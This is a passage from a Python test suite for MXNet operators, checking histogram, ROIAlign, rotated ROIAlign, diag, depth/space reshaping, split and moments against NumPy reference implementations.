bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
        # Windows doesn't support setting environment variables on the fly, so skip this for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
# skip errors since test is to check all names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
if (is_windows):
        # Windows doesn't support setting environment variables on the fly, so skip this for now
pass
else:
# Disable subgraph in case subgraph will replace symbol
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
del os.environ['MXNET_SUBGRAPH_BACKEND']
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.Activation(x, act_type='softsign'),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
}
# Loop over operators
for name, op in unary_ops.items():
# Loop over shapes
for shape in shapes:
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
@with_seed()
@pytest.mark.serial
def test_ravel():
    # Be aware that check_symbolic_forward uses float arrays internally, which
    # limits the representable flat-index range. Taking dim==4 and a data range
    # of [0, ..., 100] can already cause precision issues and break this test.
for dim in [1, 2, 3, 4]:
data = np.random.randint(50, size=(dim, 500))
shape = tuple(np.add(np.amax(data, axis=1), [1]))
a = mx.sym.Variable('a')
ravel_npy = np.ravel_multi_index(data, shape)
b = mx.sym.ravel_multi_index(a, shape=shape)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
# Test with leading dimension set to -1.
shape2 = shape
shape2 = (-1,)+shape[1:]
b = mx.sym.ravel_multi_index(a, shape=shape2)
check_symbolic_forward(b, location={'a': data}, expected=[ravel_npy])
c = mx.sym.unravel_index(a, shape=shape2)
check_symbolic_forward(c, location={'a': ravel_npy}, expected=[data])
@with_seed()
def test_unravel_index():
unravel_shape = (2, 10)
unravel_size = np.prod(unravel_shape)
for shape in [(10,), (2, 10), (3, 4, 5)]:
a = np.random.randint(0, unravel_size, size=shape)
b = np.stack(np.unravel_index(a, shape=unravel_shape), 0)
a_mx = mx.nd.array(a)
b_mx = mx.nd.unravel_index(a_mx, shape=unravel_shape)
assert_array_equal(b, b_mx.asnumpy())
def test_context_num_gpus():
try:
        # Note: the test runs on both GPU and CPU hosts, so we cannot assert
        # a specific number here.
assert mx.context.num_gpus() >= 0
except mx.MXNetError as e:
        # Note: on a CPU-only host, CUDA sometimes cannot determine the number
        # of GPUs.
if str(e).find("CUDA") == -1:
raise e
@with_seed()
@pytest.mark.serial
def test_op_roi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0), []
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
grad = [(y_low, x_low, w1), (y_low, x_high, w2),
(y_high, x_low, w3), (y_high, x_high, w4)
]
return val, grad
def roialign_forward_backward(data, rois, pooled_size, spatial_scale, sampling_ratio,
position_sensitive, dy):
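        # NumPy reference for (position-sensitive) ROIAlign: each RoI is divided into
        # PH x PW bins, every bin averages a grid of bilinearly interpolated samples,
        # and the backward pass scatters dy through the same bilinear weights.
        # Gradients are not propagated to the RoI coordinates, so drois stays zero.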
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 5,\
ValueError(
'The length of the axis 1 of rois should be 5 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
C_out = C // PH // PW if position_sensitive else C
out = np.zeros((R, C_out, PH, PW), dtype=T)
dx = np.zeros_like(data)
drois = np.zeros_like(rois)
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
@with_seed()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
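        # NumPy reference for rotated ROIAlign: rois are (batch_idx, cx, cy, w, h, angle in degrees).
        # Sampling points are laid out in the box's local frame and rotated by the box angle
        # around its center before bilinear interpolation; only the forward pass is checked below.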
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
    # Test 1d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
    # k = -1, axis1=1, axis2=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
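        # NumPy reference for depth_to_space: split the channel dim into (block, block, c/block^2),
        # move the two block factors next to the spatial dims, then merge them into height and width.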
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
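        # NumPy reference for space_to_depth (inverse of depth_to_space): split height and width
        # into (h/block, block) and (w/block, block) and fold both block factors into the channel dim.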
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
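        # Reference softmax cross entropy: -sum(label * log(p)) over the whole batch, where `data`
        # already contains softmax probabilities and `label` is one-hot encoded.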
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
